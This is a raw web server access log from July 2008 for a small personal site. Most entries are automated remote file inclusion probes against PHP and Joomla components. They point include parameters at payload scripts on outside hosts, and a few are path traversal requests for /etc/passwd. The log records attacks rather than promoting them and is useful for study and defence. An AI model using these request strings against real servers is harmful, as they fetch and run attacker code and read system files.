218.38.54.160 - - [19/Jul/2008:10:48:38 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:48:39 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:48:48 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:48:50 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:48:51 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.126.254.80 - - [19/Jul/2008:10:48:59 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:49:04 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:49:04 -0700] "GET /bikes/dteel/2008_02_23/ HTTP/1.0" 200 1540 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:49:09 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:49:13 -0700] "GET /logs/access_080315.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:49:19 -0700] "GET /logs/access_080315.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:49:22 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:49:24 -0700] "GET /logs/access_080123.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:49:39 -0700] "GET /logs/access_080123.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:49:41 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:49:43 -0700] "GET /logs/access_080315.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:50:06 -0700] "GET /bikes/dteel/EQ2/ HTTP/1.0" 200 825 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:50:11 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:50:11 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:50:11 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:50:13 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:50:17 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:50:21 -0700] "GET /logs/access_080315.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:50:24 -0700] "GET /index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18391 "-" "libwww-perl/5.803" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:50:25 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:50:28 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:50:32 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:50:36 -0700] "GET /logs/access_080330.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:50:42 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:50:54 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:50:55 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:50:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:50:55 -0700] "GET /logs/access_080325.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:51:04 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:51:06 -0700] "GET /bikes/dteel/IMG_2389s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:51:08 -0700] "GET /index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18375 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:51:09 -0700] "GET /logs/access_080315.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:10:51:35 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.231.112 - - [19/Jul/2008:10:51:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.112 - - [19/Jul/2008:10:51:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0109.jpg HTTP/1.1" 200 364454 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:51:46 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 200 18511 "-" "libwww-perl/5.75" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:52:00 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:52:03 -0700] "GET /bikes/dteel/IMG_2390s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:52:05 -0700] "GET /logs/access_071229.log/scanhttp://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:52:11 -0700] "GET /logs/access_080331.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:52:30 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:52:33 -0700] "GET //index.php?DOCUMENT_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:52:33 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.10.140.162 - - [19/Jul/2008:10:52:33 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [19/Jul/2008:10:52:33 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:52:39 -0700] "GET /logs/access_080212.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:52:47 -0700] "GET /logs/access_071226.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:53:00 -0700] "GET /logs/index.php3?act=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:53:01 -0700] "GET /index.php3?act=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:53:02 -0700] "GET /bikes/dteel/IMG_2391s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
87.106.101.24 - - [19/Jul/2008:10:53:05 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [19/Jul/2008:10:53:08 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18507 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:53:23 -0700] "GET /logs/access_080513.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:53:44 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:53:45 -0700] "GET //index.php?DOCUMENT_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:53:46 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:53:47 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:53:47 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:53:48 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:53:52 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.10.140.162 - - [19/Jul/2008:10:53:54 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [19/Jul/2008:10:53:54 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:54:01 -0700] "GET /bikes/dteel/IMG_2393s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
80.93.62.97 - - [19/Jul/2008:10:54:06 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [19/Jul/2008:10:54:09 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 200 18557 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [19/Jul/2008:10:54:10 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:54:13 -0700] "GET /logs/access_080225.log/modules/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:54:13 -0700] "GET /logs/access_080225.log/modules/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:54:13 -0700] "GET /modules/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:54:13 -0700] "GET /modules/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:54:20 -0700] "GET /logs/access_080321.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:54:29 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:54:43 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:54:45 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:54:48 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 200 18457 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:54:49 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:10:54:57 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:55:00 -0700] "GET /logs/access_080418.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:55:01 -0700] "GET /bikes/dteel/IMG_2397s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:55:13 -0700] "GET /logs/access_080330.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:55:33 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:55:33 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:55:33 -0700] "GET /errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:55:33 -0700] "GET /errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:55:56 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:55:57 -0700] "GET /bikes/dteel/IMG_2399s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:55:57 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
193.109.80.8 - - [19/Jul/2008:10:56:10 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.109.80.8 - - [19/Jul/2008:10:56:13 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 200 18519 "-" "libwww-perl/5.805" "www.dmulk.com"
193.109.80.8 - - [19/Jul/2008:10:56:14 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:21 -0700] "GET /logs/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:21 -0700] "GET /errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:28 -0700] "GET /logs/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:28 -0700] "GET /errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:41 -0700] "GET /logs/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:41 -0700] "GET /errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:47 -0700] "GET /logs/access.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:10:56:47 -0700] "GET /logs/access.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:56:52 -0700] "GET /bikes/dteel/IMG_2401s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:56:57 -0700] "GET /logs/access_071226.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:57:16 -0700] "GET /logs/errors.php?error=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:57:17 -0700] "GET /errors.php?error=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
82.206.0.44 - - [19/Jul/2008:10:57:42 -0700] "GET /logs/access_080315.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [19/Jul/2008:10:57:50 -0700] "GET ///plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:57:52 -0700] "GET /bikes/dteel/IMG_2402s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
85.25.10.95 - - [19/Jul/2008:10:57:52 -0700] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [19/Jul/2008:10:57:53 -0700] "GET /logs///plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:57:54 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:57:54 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:57:54 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:57:54 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.194.90.180 - - [19/Jul/2008:10:57:55 -0700] "GET /logs/access.log///plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.10.95 - - [19/Jul/2008:10:57:55 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:57:56 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
85.25.10.95 - - [19/Jul/2008:10:57:58 -0700] "GET /logs/access_080128.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
